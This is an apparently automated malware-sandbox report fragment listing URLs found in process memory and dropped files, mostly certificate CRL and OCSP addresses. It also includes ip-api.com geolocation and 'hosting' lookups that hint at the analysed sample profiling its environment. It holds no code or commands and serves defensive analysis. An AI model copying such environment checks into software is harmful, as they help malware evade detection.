cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: cmd.exe, 00000001.00000003.2093290332.000001C91692B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2097775097.000001C91692B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodo
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: cmd.exe, 00000001.00000003.2093373863.000001C916899000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C91689F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C91686B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2094158420.000001C916A4C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091622217.000001C9172D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C91686B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098181840.000001C916A4D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1936844561.0000022BF4E10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2946092630.00000240CA6B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1915922706.00000216A4AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: cmd.exe, 00000001.00000003.2092429001.000001C91686B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1756903455.000001C91687D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C91686B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoi
              Source: powershell.exe, 0000000A.00000002.1944041787.0000022BF5308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 0000000A.00000002.1941584429.0000022BF4FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsus
              Source: cmd.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: cmd.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: powershell.exe, 0000000A.00000002.1936844561.0000022BF4E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: svchost.exe, 0000001C.00000002.2945905884.00000240CA600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _lzma.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: cmd.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: cmd.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: cmd.exe, 00000001.00000003.1711840734.000001C916513000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1710834242.000001C916513000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1707179329.000001C916513000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1713839904.000001C916513000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1710533213.000001C916513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-
              Source: cmd.exe, 00000001.00000003.1710834242.000001C9164F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA818000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA84D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.28.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: cmd.exe, 00000001.00000002.2096563852.000001C916813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr;
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr;r
              Source: powershell.exe, 0000000A.00000002.1921700261.0000022BECA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CC80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168E42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
